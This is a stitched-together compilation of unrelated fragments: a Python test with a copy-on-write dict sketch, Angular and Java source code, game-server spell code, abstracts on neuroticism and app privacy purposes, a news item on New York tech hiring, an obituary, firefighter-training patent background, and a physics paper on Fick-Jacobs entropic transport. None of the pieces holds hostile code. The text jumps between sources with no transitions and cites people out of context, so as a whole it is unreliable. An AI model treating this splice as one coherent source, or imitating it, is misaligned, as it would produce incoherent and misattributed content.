    expected = (
        "{'new_key': 'new_value', 'key1': 'value1'}",
        "{'key1': 'value1', 'new_key': 'new_value'}",
    )
    assert repr(cd) in expected
    assert str(cd) in expected
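For context, the copy-on-write behavior this test exercises can be reproduced with a minimal wrapper; the sketch below illustrates the expected semantics only and is not the actual cowdict implementation.

class MiniCowDict:
    """Minimal copy-on-write dict: reads fall through to the base mapping,
    writes and deletes are recorded locally and never touch the base."""

    def __init__(self, base):
        self._base = base
        self._added = {}
        self._deleted = set()

    def __setitem__(self, key, value):
        self._deleted.discard(key)
        self._added[key] = value

    def __delitem__(self, key):
        if key in self._added:
            del self._added[key]
        elif key in self._base:
            self._deleted.add(key)
        else:
            raise KeyError(key)

    def _items(self):
        for k, v in self._base.items():
            if k not in self._deleted and k not in self._added:
                yield k, v
        yield from self._added.items()

    def __repr__(self):
        return repr(dict(self._items()))

base = {"key1": "value1", "key2": "value2"}
cd = MiniCowDict(base)
cd["new_key"] = "new_value"
del cd["key2"]
print(cd)    # {'key1': 'value1', 'new_key': 'new_value'}
print(base)  # base is untouched: {'key1': 'value1', 'key2': 'value2'}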
High neuroticism and depressive temperament are associated with dysfunctional regulation of the hypothalamic-pituitary-adrenocortical system in healthy volunteers Objective: Elevated neuroticism, depressive temperament and dysfunctional regulation of the hypothalamic-pituitary-adrenocortical (HPA) system are considered risk factors for unipolar depression. An interaction of these vulnerability factors has been suggested, but is controversially discussed. In the absence of other informative studies, we set out for a replication test and for elucidation of the underlying mechanism.
import { NgModule, ModuleWithProviders } from '@angular/core';
import { HTTP_INTERCEPTORS } from '@angular/common/http';
import { NgProgressInterceptor } from './ng-progress.interceptor';
import { NgProgressHttpConfig, NG_PROGRESS_HTTP_CONFIG } from './ng-progress-http.interface';

@NgModule({
  providers: [
    { provide: HTTP_INTERCEPTORS, useClass: NgProgressInterceptor, multi: true }
  ]
})
export class NgProgressHttpModule {
  static withConfig(config: NgProgressHttpConfig): ModuleWithProviders<NgProgressHttpModule> {
    return {
      ngModule: NgProgressHttpModule,
      providers: [
        { provide: NG_PROGRESS_HTTP_CONFIG, useValue: config }
      ]
    };
  }
}
import { SpellFunction } from '../spellbook';
import { getSpellAttributes } from '../experience';
import { spawnFrom } from '../spawnFrom';
import { PrefabHash } from 'att-string-transcoder';
import { spawn } from '../spawn';
import { getNearbySoulbonds } from '../getNearbySoulbonds';

type PlayerCheckStatHealthResponse = {
  Result?: {
    Value: number;
  };
};

export const heroism: SpellFunction = async (voodoo, accountId, upgradeConfigs) => {
  const upgrades = voodoo.getSpellUpgrades({ accountId, spell: 'heroism' });
  const attributes = getSpellAttributes(upgrades, upgradeConfigs);

  const player = await voodoo.getPlayerDetailed({ accountId });
  const { position, rotation } = spawnFrom(player, 'rightPalm', 0.05);

  spawn(voodoo, accountId, {
    prefabObject: {
      hash: PrefabHash.Potion_Medium,
      position,
      rotation
    },
    components: {
      NetworkRigidbody: {
        position,
        rotation
      },
      LiquidContainer: {}
    }
  });

  const multiplier = 1 + attributes.intensify / 100;
  const duration = attributes.concentration;
  const searchRadius = attributes.projection;

  let nearbySoulbondIds: number[] = [];

  if (searchRadius > 0) {
    const nearbySoulbonds = await getNearbySoulbonds(voodoo, accountId, searchRadius);
    nearbySoulbondIds = nearbySoulbonds.map(soulbond => soulbond.id);
  }

  const playerIds = [accountId, ...nearbySoulbondIds];

  for (const playerId of playerIds) {
    const [baseMaxHealth, currentHealth] = await Promise.all([
      voodoo.getPlayerCheckStatBase({ accountId: playerId, stat: 'maxhealth' }),
      voodoo.getPlayerCheckStatCurrent({ accountId: playerId, stat: 'health' })
    ]);

    let buffedMaxHealth = 0,
      buffedHealth = 0,
      delta = 0;

    /* Raise max health. */
    if (baseMaxHealth) {
      buffedMaxHealth = baseMaxHealth * multiplier;
      delta = buffedMaxHealth - baseMaxHealth;
    }

    /* Increase health by same amount as max health buff. */
    if (currentHealth && delta) {
      buffedHealth = currentHealth + delta;
    }

    if (buffedMaxHealth && buffedHealth) {
      voodoo.command({
        accountId,
        command: `player modify-stat ${playerId} maxhealth ${buffedMaxHealth} ${duration} false`
      });
      voodoo.command({
        accountId,
        command: `player modify-stat ${playerId} health ${buffedHealth} ${duration} false`
      });
    }
  }

  const { name, serverId, serverName } = voodoo.players[accountId];
  voodoo.logger.success(`[${serverName ?? serverId} | ${name}] cast Heroism`);
};
Consistency Analysis of Data-Usage Purposes in Mobile Apps While privacy laws and regulations require apps and services to disclose the purposes of their data collection to the users (i.e., why do they collect my data?), the data usage in an app's actual behavior does not always comply with the purposes stated in its privacy policy. Automated techniques have been proposed to analyze apps' privacy policies and their execution behavior, but they often overlooked the purposes of the apps' data collection, use and sharing. To mitigate this oversight, we propose PurPliance, an automated system that detects the inconsistencies between the data-usage purposes stated in a natural language privacy policy and those of the actual execution behavior of an Android app. PurPliance analyzes the predicate-argument structure of policy sentences and classifies the extracted purpose clauses into a taxonomy of data purposes. Purposes of actual data usage are inferred from network data traffic. We propose a formal model to represent and verify the data usage purposes in the extracted privacy statements and data flows to detect policy contradictions in a privacy policy and flow-to-policy inconsistencies between network data flows and privacy statements. Our evaluation results of end-to-end contradiction detection have shown PurPliance to improve detection precision from 19% to 95% and recall from 10% to 50% compared to a state-of-the-art method. Our analysis of 23.1k Android apps has also shown PurPliance to detect contradictions in 18.14% of privacy policies and flow-to-policy inconsistencies in 69.66% of apps, indicating the prevalence of inconsistencies of data practices in mobile apps.
Answering negative comments online quickly is key. Fluent in geek speak? You’re hired. While the latest unemployment numbers for New York City still show a gloomy prospect for many would-be workers, recent reports from Dice.com and Pace University show just the opposite for those in the information technology industry—employers can’t seem to fill competitive high-tech positions. Some companies are even engaging in battles for hard-to-find tech talent, said Tom Silver, a senior vice president at Dice, a career website for technology and engineering professionals. “Filling talent voids can be painful and expensive,” he said. According to July’s Dice Report, New York-New Jersey was ranked No. 1 across top metro areas by the number of new job posts on the website, with more than 8,200 tech positions. That’s almost twice the number of postings for tech jobs in Silicon Valley (which came in at No. 3), and more than Chicago (No. 4), Los Angeles (No. 5) and Boston (No. 6) combined. Washington D.C.-Baltimore came in second place, with 7,400 posts. “It’s the fifth straight month of companies posting more jobs on the site,” said Mr. Silver. In Manhattan, the information technology job market showed remarkable strength during the second quarter, according to the Pace/SkillPROOF IT Index Report, also known as PSII. The index, which provides a snapshot of IT job openings at major firms, saw a 47% increase, from 74 to 110. It was the largest quarterly gain since the index began tracking data in 2004, according to the report. Indeed, while the overall unemployment rate for New York City was 9.5% in June, experts estimate the rate is half that, or even lower, for the high-tech industry. The caveat, however, is that, although demand for IT professionals is high, computer programming skills are not enough (on their own) to get a job, experts said. Business, sales or administration experience is also essential. “Schools are preparing them in this capacity” to be able to wear many hats, said Mr. Hormozi. For instance, computer science students can take marketing classes, he said. For IT professionals already in the workforce, Mr. Hormozi said that they can increase their value with a business or public administration certificate, rather than learning another programming language. In fact, job postings for IT managers and network/data communications analysts were the largest contributors to the growth of the Pace index in Manhattan, while the Dice Report shows that the tech skills currently most wired for success are C#, Java/J2EE, and SAP or Oracle know-how. Moreover, the companies engaging in battles for these coveted skills, said Mr. Silver, is likely to make retention the issue this year in technology departments.
package com.altugcagri.smep.persistence.model;

import com.fasterxml.jackson.annotation.JsonIgnore;
import lombok.AllArgsConstructor;
import lombok.Builder;
import lombok.Getter;
import lombok.NoArgsConstructor;
import lombok.Setter;
import org.hibernate.annotations.NaturalId;
import org.springframework.lang.Nullable;

import javax.persistence.Column;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.GenerationType;
import javax.persistence.Id;
import javax.persistence.ManyToMany;
import javax.persistence.Table;
import javax.validation.constraints.Email;
import javax.validation.constraints.NotBlank;
import javax.validation.constraints.Size;
import java.util.Set;

@Entity
@Table(name = "users")
@Getter
@Setter
@Builder
@NoArgsConstructor
@AllArgsConstructor
public class User extends DataBaseEntity {

    @Id
    @GeneratedValue(strategy = GenerationType.IDENTITY)
    private Long id;

    @NotBlank
    @Size(max = 40)
    private String name;

    @NotBlank
    @Size(max = 15)
    @Column(unique = true)
    private String username;

    @NaturalId
    @NotBlank
    @Size(max = 40)
    @Email
    @Column(unique = true)
    private String email;

    @NotBlank
    @Size(max = 100)
    private String password;

    @JsonIgnore
    @Nullable
    @ManyToMany(mappedBy = "enrolledUsers")
    private Set<Topic> enrolledTopics;
}
/* Copyright (c) 2017, Lawrence Livermore National Security, LLC. Produced at
   the Lawrence Livermore National Laboratory. LLNL-CODE-734707. All Rights
   reserved. See files LICENSE and NOTICE for details.

   This file is part of CEED, a collection of benchmarks, miniapps, software
   libraries and APIs for efficient high-order finite element and spectral
   element discretizations for exascale applications. For more information and
   source code availability see http://github.com/ceed.

   The CEED research is supported by the Exascale Computing Project
   (17-SC-20-SC), a collaborative effort of two U.S. Department of Energy
   organizations (Office of Science and the National Nuclear Security
   Administration) responsible for the planning and preparation of a capable
   exascale ecosystem, including software, applications, hardware, advanced
   system engineering and early testbed platforms, in support of the nation's
   exascale computing imperative. */

void add_mult_mass_hex(
    int ndof_1d,      /* number of 1D dofs (points) */
    int nqpt_1d,      /* number of 1D quadrature points */
    int nelem,        /* number of elements */
    double *D,        /* (nqpt_1d)^3 x nelem */
    double *B1d,      /* nqpt_1d x ndof_1d dense matrix, column-major layout */
    double *B1d_t,    /* transpose of B1d */
    int *dof_offsets, /* array of size (ndof_1d)^3 x nelem representing a boolean P */
    double *x,        /* input vector */
    double *y         /* result, input-output vector */
);
George Albert Tavares Sr., 85, of Wailuku, a retired investor, died at home. He was born in Hawaii. He is survived by companion Louise Ruiz; former wife Helen; sons George Jr., Clyde and Paul; daughters Sharon Tran, Helen Ann Daniels and Paulette Tavares; stepson Frankie Ruiz; stepdaughter Roxanne Ruiz; brothers Kenneth and Joey; sisters Hilda Long, Harriette Takitani, Irene Wilson, Annette Tavares, Bertha Sugimoto and Margaret Fukumoto; and numerous grandchildren and great-grandchildren. Visitation: 9 a.m. Sunday at Ballard Family Mortuary. Services: 11 a.m. Cremation to follow.
A firefighter fitness and training apparatus allows a firefighter to simulate the pulling of a fire hose, the breaching of a ceiling during a fire, and the removal of victims from a hazardous environment. It is important for firefighters to develop the reflexes and muscles needed to perform the functions that they are commonly called upon to perform during fire and rescue operations. The use of exercise and training machines is very useful for developing such reflexes and muscles and for keeping firefighters in shape for the specific functions that they are required to perform. A typical function that a firefighter may be called upon to perform is to drag large sections of fire hose from a fire truck to a fire hydrant or to a better location for the application of water from the fire hydrant. Another common technique for firefighters is the breaching of ceilings, in which pike poles or the like must be shoved up into the ceiling to breach it. Firefighters also have to be in condition for removing victims from a hazardous environment. This is commonly done by grasping the victim and dragging him from a hazardous to a safer environment. It is thus desirable to have firefighter training equipment in the nature of a fire sled which can provide training in the pulling of a fire hose, in the grasping and dragging of a victim to remove the victim from a hazardous environment, and simulated training in the breaching of a ceiling in an area where a fire may be in the ceiling. Prior art patents that may provide useful training for firefighters can be seen in the Rivkin U.S. Pat. No. 4,688,792 for a training and exercise machine for football and wrestling, which can also be used for training firefighters in the development of rapid dynamic reflexes. This patent provides a dummy mounted to a crossbeam. In the Livingston U.S. Pat. No. 4,526,548, a mobile firefighting training trailer is provided having a plurality of rooms and passages with simulated appliances and furniture and having a smoke generator and flame-generating devices positioned for simulating fires in a house. In the Ernst et al. U.S. Pat. No. 4,861,270, a firefighting trailer is also provided for training firefighters. In the Tommarello et al. U.S. Pat. No. 5,518,402, a firefighter trainer is provided having personal tracking and constructive entry determination training that trains firefighters to extinguish simulated fire scenarios. In the Musto et al. U.S. Pat. No. 5,203,707, a modular firefighter trainer is provided for use in training firefighters, while the Musto et al. U.S. Pat. No. 5,275,571 is a portable fire trainer for use by an instructor in training company employees in the use of fire extinguishers for extinguishing Class A, B or C fires. In the Joynt et al. U.S. Pat. No. 5,447,437, a portable firefighter training system for fire-extinguishing training is provided for educating people in the proper use of firefighting procedures. In the Ott U.S. Pat. No. 6,824,504, a full-body, adjustable-weight sled exerciser is provided for training football players in tackling or blocking practice. The Rogers et al. U.S. Pat. No. 5,688,136 is a firefighter trainer for use in training firefighters on passenger rescue during simulated aircraft cabin fires and during simulated oil-spill module fires. The Welch et al. U.S. Pat. No.
5,927,990 is a firefighter trainer for simulating flashover phenomena and teaches the trainee how to recognize warning signs of flashovers and what follows the warning signs and what to do if confronted with the warning signs. The Dunn U.S. Pat. No. 6,077,081 is a firefighting training method and apparatus for simulating the pumping of water through various long lengths of hose to train firefighters to deliver a proper amount of water through the fire hose. The Deshoux et al. U.S. Pat. No. 6,129,552 is a teaching installation for learning and practicing the use of firefighting equipment, such as fire extinguishers. The present invention is directed towards a firefighter training and exercising apparatus which has a fire sled equipped for training a firefighter in the pulling of a fire hose and in the breaching of a ceiling and in the removing of a victim from a hazardous environment.
/**
 * Perform a real clone of the workflow meta-data object, including cloning all lists and copying
 * all values. If the doClear parameter is true, the clone will be cleared of ALL values before
 * the copy. If false, only the copied fields will be cleared.
 *
 * @param doClear Whether to clear all of the clone's data before copying from the source object
 * @return a real clone of the calling object
 */
public Object realClone(boolean doClear) {
  try {
    WorkflowMeta workflowMeta = (WorkflowMeta) super.clone();
    if (doClear) {
      workflowMeta.clear();
    } else {
      workflowMeta.workflowActions = new ArrayList<>();
      workflowMeta.workflowHops = new ArrayList<>();
      workflowMeta.notes = new ArrayList<>();
      workflowMeta.namedParams = new NamedParameters();
    }

    // Deep-copy actions, hops, notes and named parameters into the clone.
    for (ActionMeta action : workflowActions) {
      workflowMeta.workflowActions.add((ActionMeta) action.cloneDeep());
    }
    for (WorkflowHopMeta hop : workflowHops) {
      workflowMeta.workflowHops.add(hop.clone());
    }
    for (NotePadMeta notePad : notes) {
      workflowMeta.notes.add(notePad.clone());
    }
    for (String key : listParameters()) {
      workflowMeta.addParameterDefinition(
          key, getParameterDefault(key), getParameterDescription(key));
    }

    return workflowMeta;
  } catch (Exception e) {
    // Clone failures are swallowed and signaled with a null result.
    return null;
  }
}
Entropic transport - A test bed for the Fick-Jacobs approximation

Biased diffusive transport of Brownian particles through irregularly shaped, narrow confining quasi-one-dimensional structures is investigated. The complexity of the higher-dimensional diffusive dynamics is reduced by means of the so-called Fick-Jacobs approximation, yielding an effective one-dimensional stochastic dynamics. Accordingly, the elimination of transverse, equilibrated degrees of freedom stemming from geometrical confinements and/or bottlenecks causes entropic potential barriers which the particles have to overcome when moving forward noisily. The applicability and the validity of the reduced kinetic description are tested by comparing the approximation with Brownian dynamics simulations in full configuration space. This non-equilibrium transport in such quasi-one-dimensional irregular structures implies, for moderate-to-strong bias, a characteristic violation of the Sutherland-Einstein fluctuation-dissipation relation.

Introduction

Diffusion of Brownian particles through narrow, tortuous confining structures such as micro- and nano-pores, zeolites, biological cells and microfluidic devices plays a prominent role in the dynamical characterization of these systems (Barrer, 1978; Berezhkovskii & Bezrukov, 2005; Hille, 2001; Matthias & Müller, 2003; Nixon & Slater, 2002; Volkmuth & Austin, 1992). Effective control schemes for transport in these systems require a detailed understanding of the diffusive mechanisms involving small objects and, in this regard, an operative measure to gauge the role of fluctuations. The study of these transport phenomena is in many respects equivalent to an investigation of geometrically constrained Brownian dynamics (Mazo, 2002). With this work we focus on the stochastic transport of small-sized particles in confined geometries and the feasibility of the so-called Fick-Jacobs (FJ) approximation to describe the steady-state particle densities. Restricting the volume of the configuration space available to the diffusing particles by means of confining boundaries or obstacles discloses intriguing entropic phenomena. The driven transport of charged particles across bottlenecks, such as ion transport through artificial nanopores or artificial ion pumps, or transport in biological channels (Berezhkovskii & Bezrukov, 2005), are familiar systems in which diffusive transport is regulated by entropic barriers. Similarly, the operation of artificial Brownian motors and molecular machines relies as well on a mutual interplay among diffusion and binding action by energetic or, more relevant in the present context, entropic barriers (Astumian & Hänggi, 2002; Derényi & Astumian, 1998; Reimann & Hänggi, 2002). The outline of this work is as follows: in Sec. 2 we introduce our model and formulate the mathematical formalism needed to model the diffusion of a Brownian particle immersed in a confined medium. In Sec. 3 we present the FJ approximation and compute the entropic effects on the particle transport and on the steady-state probability density in the presence of an applied force in the transport direction. In Sec. 4 we compare the numerically precise 2D simulation results with those obtained from applying the FJ approximation. In Sec. 5 we discuss the effective lateral diffusion and test the Sutherland-Einstein fluctuation-dissipation relation. Sec. 6 provides a discussion of our main findings.
Overdamped system dynamics

Generic mass transport through confined structures such as irregular pores and channels, cf. the one depicted in Fig. 1, is governed by the transport of suspended Brownian particles subjected to an externally applied potential V(r̃). Generally, the dynamics of the Brownian particle inside the medium can be well described by a Langevin dynamics in the over-damped limit, with reflecting boundary conditions at the channel walls. The stochastic dynamics then reads

γ dr̃/dt̃ = −∇V(r̃) + √(γ k_B T) ξ(t̃) ,   (2.1)

where r̃ is the position vector of a Brownian particle at time t̃, γ denotes the friction coefficient, k_B is the Boltzmann constant and T refers to the environmental temperature. Thermal fluctuations due to the coupling of the Brownian particle to the environment are modeled by Gaussian white noise ξ(t̃) with zero mean and an auto-correlation function obeying the Sutherland-Einstein fluctuation-dissipation relation (Hänggi & Marchesoni, 2005):

⟨ξ_i(t̃) ξ_j(t̃′)⟩ = 2 δ_ij δ(t̃ − t̃′) ,  i, j = x, y .   (2.2)

For simplicity we consider the dynamics of a Brownian particle that is subjected to a constant force F = F e_x acting along the direction of the channel axis (here, the x-direction). The Langevin equation for the over-damped dynamics then reads

γ dr̃/dt̃ = F e_x + √(γ k_B T) ξ(t̃) ,   (2.3)

with reflecting (i.e., no cross-flow) boundary conditions implied at the channel walls, which confine the Brownian particles within the channel geometry. In order to further simplify the treatment of this set-up we introduce dimensionless variables. We measure all lengths in units of the period length L, i.e., r̃ = L x, where x denotes the dimensionless position vector of the particle. As the unit of time we choose twice the time the particle takes to diffusively overcome the distance L, which is given by τ = γ L² / (k_B T), i.e., t̃ = τ t. In these dimensionless variables the Langevin dynamics assumes the form

dx/dt = f e_x + ξ(t) ,  with  f := F L / (k_B T) .   (2.4)

The dimensionless scaling parameter f characterizes the force as the ratio between the work F L done on the particle along a distance of the period length L and the thermal energy k_B T. We anticipate here the fact that in the case of diffusion occurring in purely energetic potential landscapes the driving force F and the temperature T are independent variables; in contrast, in systems with entropic features these two quantities become coupled. In order to adjust a certain value of f one can modify either the force strength F or the noise intensity k_B T. The corresponding Fokker-Planck equation describing the time evolution of the probability density P(x, t) takes the form (Hänggi & Thomas, 1982; Risken, 1989):

∂P(x, t)/∂t = −∇ · J(x, t) ,   (2.5)

where J(x, t) is the probability current:

J(x, t) = f e_x P(x, t) − ∇P(x, t) .   (2.6)

Note that, for channels with similar geometry which are related by a scale transformation r̃ → λ r̃, λ > 0, the transport properties are determined by the single dimensionless parameter f, which subsumes the respective period length, the external force and the temperature of the surrounding fluid. The no-flow condition beyond the channel walls leads to a vanishing probability current at those boundaries. Consequently, due to the impenetrability of the channel walls, the normal component of the probability current J(x, t) vanishes at those boundaries. Thus, the boundary conditions at the channel walls are given by

J(x, t) · n = 0  at the channel walls,   (2.7)

where n denotes the normal vector at the channel walls.
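As a concrete illustration of the dimensionless dynamics (2.4), the following sketch integrates the Langevin equation with a stochastic Euler scheme, in the spirit of the simulations of Sec. 4; the wall treatment is a simple rejection rule (an approximation to reflection that is adequate for small time steps), and the channel parameters are placeholders for the geometry specified in Eq. (4.1) below.

import numpy as np

def omega(x, a=0.25, b=0.255):
    """Half-width of the channel; placeholder periodic boundary function."""
    return a * np.sin(2 * np.pi * x) + b

def simulate(f, n_steps=100_000, dt=1e-5, rng=np.random.default_rng(0)):
    """Euler integration of dx/dt = f e_x + xi(t) with reflecting walls.

    The noise increment has variance 2*dt per component, matching the
    correlator (2.2) in dimensionless units.
    """
    x, y = 0.0, 0.0
    for _ in range(n_steps):
        noise = rng.normal(0.0, np.sqrt(2 * dt), size=2)
        x_new = x + f * dt + noise[0]
        y_new = y + noise[1]
        if abs(y_new) < omega(x_new):  # accept only moves inside the channel
            x, y = x_new, y_new
    return x, y

print(simulate(f=1.0))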
The boundary of a 2D periodic channel, which is mirror-symmetric about the x-axis, is given by the dimensionless periodic functions y = ±ω(x), i.e., ω(x + 1) = ω(x) for all x, where x and y are the cartesian components of x. In this case, the boundary condition reads

∂P/∂y ± ω′(x) (f P − ∂P/∂x) = 0  at  y = ±ω(x) .   (2.8)

Approximate solutions, though, can be obtained on the basis of a one-dimensional diffusion problem proceeding in an effective potential. Narrow channel openings, which act as geometric hindrances in the original system, then manifest themselves as entropic barriers within an effective one-dimensional diffusive FJ approximation (Jacobs, 1967; Kalinay & Percus, 2006; Reguera & Rubí, 2001; Zwanzig, 1992).

Equilibration in transverse channel directions: the Fick-Jacobs approximation

In the absence of an external force, i.e., for f = 0, it was shown (Jacobs, 1967; Kalinay & Percus, 2006; Reguera & Rubí, 2001; Zwanzig, 1992) that the dynamics of Brownian particles in confined structures (such as the one depicted in Fig. 1) can be described approximately by the FJ equation, i.e.,

∂P(x, t)/∂t = ∂/∂x { D(x) [ ∂P(x, t)/∂x + (dA(x)/dx) P(x, t) ] } .   (3.1)

This 1D equation is obtained from the full 2D Smoluchowski equation upon the elimination of the transverse spatial degree of freedom y, by assuming a much faster equilibration in that channel direction than in the longitudinal one. An analogous reduction mechanism has been used for the transport of neutrons through nuclear reactors (Beckurts & Wirtz, 1964). In equation (3.1), P(x, t) := ∫ from −ω(x) to +ω(x) of P(x, y, t) dy denotes the marginal probability density along the axis of the channel. A(x) corresponds to the potential of mean force, which for the considered situation equals the free energy, i.e., A(x) = E(x) − S(x) = 0 − ln ω(x), with E(x) and S(x) the dimensionless energetic and entropic contributions. We note that for three-dimensional channels an analogous approximate Fokker-Planck equation holds, in which the function ω(x) is to be replaced by π ω²(x) (i.e., the area of the corresponding cross-section). In the original work by Jacobs the 1D diffusion coefficient D(x) is constant and equals the bare diffusion constant, which assumes unity in the present dimensionless variables. However, introducing an x-dependent diffusion coefficient considerably improves the accuracy of the kinetic equation, extending its validity to more winding structures (Reguera & Rubí, 2001; Zwanzig, 1992). The expression for D(x) reads (in dimensionless units)

D(x) = 1 / [1 + ω′(x)²]^α ,   (3.2)

where α = 1/3, 1/2 for two and three dimensions, respectively, has been shown to appropriately account for the curvature effects of the confining walls (Reguera & Rubí, 2001). ω′(x) indicates the first derivative of the boundary function ω(x) with respect to x.

Figure 2. Sketch of the 2D channel and the effective one-dimensional potential: the Fick-Jacobs (FJ) approximation allows for a reduction of the 2D Brownian dynamics within the periodic channel (periodicity: L) to an approximate 1D Brownian dynamics with an effective potential given by the free energy function A(x). In the presence of an applied bias, A(x) has the form of a tilted periodic potential with a barrier height ΔA which depends on the temperature T.

In the presence of a constant force F along the direction of the channel, the FJ diffusion equation (3.1) can be recast into the form

∂P(x, t)/∂t = ∂/∂x { D(x) [ ∂P(x, t)/∂x + (dA(x)/dx) P(x, t) ] } ,  with  A(x) = −f x − ln ω(x) .   (3.3)

For a periodic channel arrangement this free energy assumes the form of a tilted periodic potential, see Fig. 2. In the absence of a force the free energy is purely entropic and Eq. (3.3) reduces to the FJ equation (3.1). On the other hand, for a straight channel the entropic contribution vanishes and the particles are solely driven by the externally applied force. Remarkably, the temperature T dictates the strength of the effective potential: an increase in temperature causes an increase in the barrier height ΔA, while for purely energetic systems the barrier height is independent of the temperature.
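To illustrate the reduced description, the following sketch evaluates the effective free energy A(x) = −f x − ln ω(x) and the corrected diffusion coefficient D(x) of Eqs. (3.2) and (3.3) for an example boundary function; the parameter values are illustrative only.

import numpy as np

def effective_1d(x, omega, d_omega, f, alpha=1/3):
    """Free energy A(x) and diffusion coefficient D(x) of the FJ description.

    alpha = 1/3 for a 2D channel, 1/2 for a 3D channel.
    """
    A = -f * x - np.log(omega(x))
    D = 1.0 / (1.0 + d_omega(x) ** 2) ** alpha
    return A, D

a, b = 0.25, 0.255  # example geometry (epsilon = b/a = 1.02, see Eq. (4.1))
omega = lambda x: a * np.sin(2 * np.pi * x) + b
d_omega = lambda x: 2 * np.pi * a * np.cos(2 * np.pi * x)

x = np.linspace(0.0, 1.0, 201)
A0, D = effective_1d(x, omega, d_omega, f=0.0)
# For f = 0 the barrier is purely entropic: Delta A = ln(omega_max/omega_min).
print("entropic barrier Delta A ≈", A0.max() - A0.min())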
(a) Steady-state probability density

Formally, the steady-state density of the particles is obtained in the limit t → ∞, i.e., P_st(x) = lim_{t→∞} P(x, t); as a consequence, ∂P_st(x)/∂t = 0. An expression for the steady-state density can be derived from Eq. (3.3), using arguments detailed in the Appendix. Using the main result in Eq. (A 12), one obtains

P_st(x) = I(x, f) / ∫ from 0 to 1 of I(z, f) dz ,   (3.4)

where

I(x, f) := e^{−A(x)} ∫ from x to x+1 of dz e^{A(z)} / D(z)   (3.5)

depends on the dimensionless position x, on the force f and, via the position-dependent diffusion coefficient, on the shape of the tube given in terms of the shape function ω(x) and its first derivative, cf. Eq. (3.2). Note that the probability density P_st(x) is normalized on the unit interval.

(b) Nonlinear mobility

The primary quantity of particle transport through periodic channels is the average particle current ⟨ẋ⟩ or, equivalently, the nonlinear mobility, which is defined as the ratio between the average particle current and the applied force f. For the average particle current we derive an expression which is similar to the Stratonovich formula for the current occurring in tilted periodic energy landscapes, but here with a spatially dependent diffusion coefficient. A detailed derivation of this expression is given in the Appendix, cf. Eq. (A 11). Hence, we obtain the nonlinear mobility for a 2D or 3D channel:

μ(f) := ⟨ẋ⟩ / f = (1 − e^{−f}) / [ f ∫ from 0 to 1 of I(z, f) dz ] ,   (3.6)

with I(z, f) given in Eq. (3.5). (A numerical evaluation of Eqs. (3.4)-(3.6) is sketched at the end of this section.)

Precise numerics for a 2D channel geometry

The steady-state density and the average particle current predicted analytically above have been compared with Brownian dynamics simulations performed by a numerical integration of the Langevin equation, Eq. (2.4), using the stochastic Euler algorithm. The shape of the exemplarily taken 2D channel is described by

ω(x) = a sin(2πx) + b ,   (4.1)

where a controls the slope of the channel walls, which in turn determines the one-dimensional diffusion coefficient D(x). For the considered channel configuration, cf. Eq. (4.1), the boundary function becomes ω(x) = a [sin(2πx) + ε], where ε = b/a = 1.02 throughout this paper. For a we chose values between 1 and 1/2. In all cases the width of the widest opening within the channel is larger by a factor of about 100 than the width at the narrowest opening. One may therefore expect rather strong entropic effects for these channel geometries.

(a) Stationary probability densities

We have evaluated the stationary probability density P_st(x, y) in the long-time limit by mapping all particle positions onto the primitive cell via translation along the longitudinal channel direction. Consequently,

P_st(x) = ∫ from −ω(x) to +ω(x) of P_st(x, y) dy .   (4.2)

Note that the steady-state marginal density P_st(x) is normalized on the primitive cell. At small values of the scaling parameter f, the 1D steady-state density given by Eq. (3.4) is in very good agreement with that obtained from the numerical simulations, see Fig. 3. This holds true for rather arbitrary channel geometries (not shown). However, the comparison fails for large values of the scaling parameter f or for more winding structures corresponding to larger a-values. When increasing the force, the maximum of P_st(x) is shifted towards the exit of the cell and the particles mostly accumulate in front of the bottleneck, see Fig. 3(a), and the 1D kinetic description starts to fail in that forward bottleneck x-region. However, by decreasing a in the geometric channel shape function, the accuracy of the FJ approximation improves considerably, up to very large force values f, see Fig. 3(b).
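For completeness, here is a minimal numerical evaluation of Eqs. (3.4)-(3.6) by direct quadrature, reusing the example boundary function of Eq. (4.1); grid sizes and parameter values are illustrative.

import numpy as np

a, b, f, alpha = 0.25, 0.255, 1.0, 1/3
omega = lambda x: a * np.sin(2 * np.pi * x) + b
d_omega = lambda x: 2 * np.pi * a * np.cos(2 * np.pi * x)
A = lambda x: -f * x - np.log(omega(x))
D = lambda x: 1.0 / (1.0 + d_omega(x) ** 2) ** alpha

def I(x, n=2000):
    """I(x, f) = exp(-A(x)) * integral over [x, x+1] of exp(A(z)) / D(z) dz."""
    z = np.linspace(x, x + 1.0, n)
    return np.exp(-A(x)) * np.trapz(np.exp(A(z)) / D(z), z)

x_grid = np.linspace(0.0, 1.0, 201)
I_vals = np.array([I(x) for x in x_grid])
norm = np.trapz(I_vals, x_grid)
P_st = I_vals / norm                        # Eq. (3.4)
mobility = (1.0 - np.exp(-f)) / (f * norm)  # Eq. (3.6)
print("mobility mu(f=1) ≈", mobility)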
As a common feature one observes for the two chosen geometric structures that in the large-force regime the numerically obtained P_st(x) is essentially constant over a wide range of x-values, indicating a minor influence of the shape of the structure on the dynamics of the laterally forward-forced particles. In this situation the thermal noise plays a minor role, and the deterministic dynamics (with diffusion set to zero) of the diffusive equation provides a good starting point. Put differently, at strong longitudinal driving strength the correction in the diffusion coefficient leading to a spatial dependency, i.e., D(x), overestimates the role of the entropic effects, and consequently the FJ approximation starts failing over extended x-regimes. The reason for the failure of the FJ approximation for large forces becomes obvious when checking the equilibration assumption in the transverse channel direction. From our simulations, we can actually analyze the validity of the hypothesis of equilibration in the transverse direction on which the FJ description relies. A detailed analysis is provided by testing the normalized steady-state probability density in the transverse direction at a given x-position, i.e.,

P_st,x(y) = P_st(x, y) / ∫ from −ω(x) to +ω(x) of P_st(x, y′) dy′ .   (4.3)

In Fig. 4, we depict the steady-state probability density at the position of maximal channel width. For small values of the scaling parameter f, P_st,x(y) is very flat, indicating an almost ideal homogeneous equilibration in the transverse direction, as required by the FJ approximation scheme. However, at large force strengths f the Brownian particles concentrate along the axis of the channel at y = 0. In this situation, the assumption of equilibration along the transverse direction fails and the density peaks around the value y = 0. The particles can only feel the presence of the boundaries when they are close to the bottlenecks. Hence, in the limit of very large force values, the influence of the entropic barriers practically disappears.

(b) Nonlinear mobility

The average particle current was derived from an ensemble average over 3 × 10^4 trajectories:

⟨ẋ⟩ = lim_{t→∞} ⟨x(t)⟩ / t .   (4.4)

